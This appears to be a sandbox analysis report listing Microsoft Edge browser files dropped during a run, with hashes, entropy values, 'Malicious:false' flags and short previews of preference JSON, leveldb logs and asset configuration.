                                                                                                                                                                                                                                                                                                                                                        SHA-256:F11EDBCEB491F1978DF0BE0C310C68F26FBB1A6D972BAF11E9DA488D8E15FF58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F26BF95F621A2DE8A1D155D056789D8E20DF5B7F4905C041A9747B7D3D5263DEB6574747AE352364476DD7D9CF8FD61467C237408151A25B85FA6CA3B877FD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17451), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17451
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.481490680623047
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhXoBIxxcInkobGXLQwK6WQlaTYj:stOXuAuffkobGUBOaTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:95CC59E06D46D8276C9AAE66F0C730DE
                                                                                                                                                                                                                                                                                                                                                        SHA1:B72266989324218A0CCBC167C65A738AC895E312
                                                                                                                                                                                                                                                                                                                                                        SHA-256:85C924DB1E9A8682772533B7C92800D9281A14CA2CED716B44BF49433F584094
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8FB9D36B858A70CEC12CE749A7118F581366AF7D87E271C33BAA091BB2BA72996C78DE81357A575115ABDEA19C7FD74662A34971A3B0F59799E4052E32E21C46
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17286), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17286
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.484814836528547
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:strPGQSu4MsbufhXoBIxxcInkobGXLQwK6WzaTYj:stOXuAuffkobGUB/aTYj
                                                                                                                                                                                                                                                                                                                                                        MD5:F9A8033BC106485F14473A44E6E4ADE7
                                                                                                                                                                                                                                                                                                                                                        SHA1:FB5749FFADFDED1E8F69C6212426F72DBB3CA2F2
                                                                                                                                                                                                                                                                                                                                                        SHA-256:812065E457F3C7510BA6A35ED298E9DB11A5AA230433881CF893F324558CBC5C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:697A11A600C554B542E37CC091E861F90B7D3F15002C82FD0644E27BBCAF4DE35C086B6ED3CF29688BB9D60AC79E1DBA9C95822937CAD3B6F660BA2B30DBE7B9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40470
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56139859910408
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376067971858364","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376067971858364","location":5,"ma
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16696), with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16696
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.441923466839279
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376067972524486","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222874922916056
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.142249675937878
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:HU2ZpMcd3+q2P923oH+Tcwt9Eh1tIFUt8YU2ZD/Zmw+YU2Ff0PXU2ufzvKYU20wh:7+cdOv4Yeb9Eh16FUt8MD//+/UKGh
                                                                                                                                                                                                                                                                                                                                                        MD5:FFC0B767FF186D1724E1A58886AB5F89
                                                                                                                                                                                                                                                                                                                                                        SHA1:2CA2EDEABDB10EF8DDEAD83C82CAB2EBB1E68938
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F37ED8CE8C580163E576296694BCFAFFBFFCEB6F9596EAE622DB473C9F8EACC6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E3BF22E1A11BCFD4349764137287CB657E00BD52A579939E07F56C2145F87E97DA2EB1617D80297381462E1DC90C4A5675BD0AA4E9FD2C7657844BC7E3AC05C9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:2024/11/14-09:29:11.965 1098 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/14-09:29:11.967 1098 Recovering log #3.2024/11/14-09:29:12.457 1098 Level-0 table #3: started.2024/11/14-09:29:12.649 1098 Level-0 table #3: 739855 bytes OK.2024/11/14-09:29:12.654 1098 Delete type=0 #3.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.354097956122928
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:EA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:EFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                                                        MD5:B598E5231650774CD06D722B49EE2428
                                                                                                                                                                                                                                                                                                                                                        SHA1:F8024A8E1B03DB6465D7AF7C86BFCAB795056028
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A3B5F7C8C048D470C45A9534AB79449EA4DDDC10736EA4524D1F961F6D5823DD
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2D7974A0B882B99A1A1657A81F01E6A075556D66AE4E98D9B6EA5AA35C9F0F0597D2A94850F96CD00F2616AD9D365C397F1326ECB51E1E0278A36109F499BCFC
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1..jxq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13376067976760960..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.147282555626772
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:HUl5upq1923oH+Tcwtk2WwnvB2KLlVUl2D4q2P923oH+Tcwtk2WwnvIFUv:sUfYebkxwnvFLp4v4YebkxwnQFUv
                                                                                                                                                                                                                                                                                                                                                        MD5:5099FDD3F606EBBDED53002B29666A55
                                                                                                                                                                                                                                                                                                                                                        SHA1:3FE7BBD5366775CA22E022462FBD700099BF3149
                                                                                                                                                                                                                                                                                                                                                        SHA-256:736AA1685EA12B38BF37D53F9CB6CF68E272DEEC6F3FE711DBC869B5405014E1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:005ECF1E9922FB671273170B1285139C7126304E438F021D75E13A704FE639F515F6AE03364020F467A7FFA9F8F2C1E5C39F3EC262573CA4B13DF63A9ABB7399
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:2024/11/14-09:26:15.606 1cf0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/14-09:26:15.645 1cf0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324619505189777
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ry:C1gAg1zfvq
                                                                                                                                                                                                                                                                                                                                                        MD5:F1DE3BFCAE1AAE6904A911A2B23BCCFD
                                                                                                                                                                                                                                                                                                                                                        SHA1:BA79062177672975667B252D74499ABE28BCC6A3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:77248481366DAD50813B8A7C944C98B8B5055C56A631878DB78A227337C6BCAE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D3E22A07D8FC65D0B398F5E93CA44EFCFAD60D19FE228BAB26AAC1DC5780CA4D2CCF3FEA7D92575DBED59D4CF30A9547C6CD90D39112E556255E14FBD3951EE5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[]
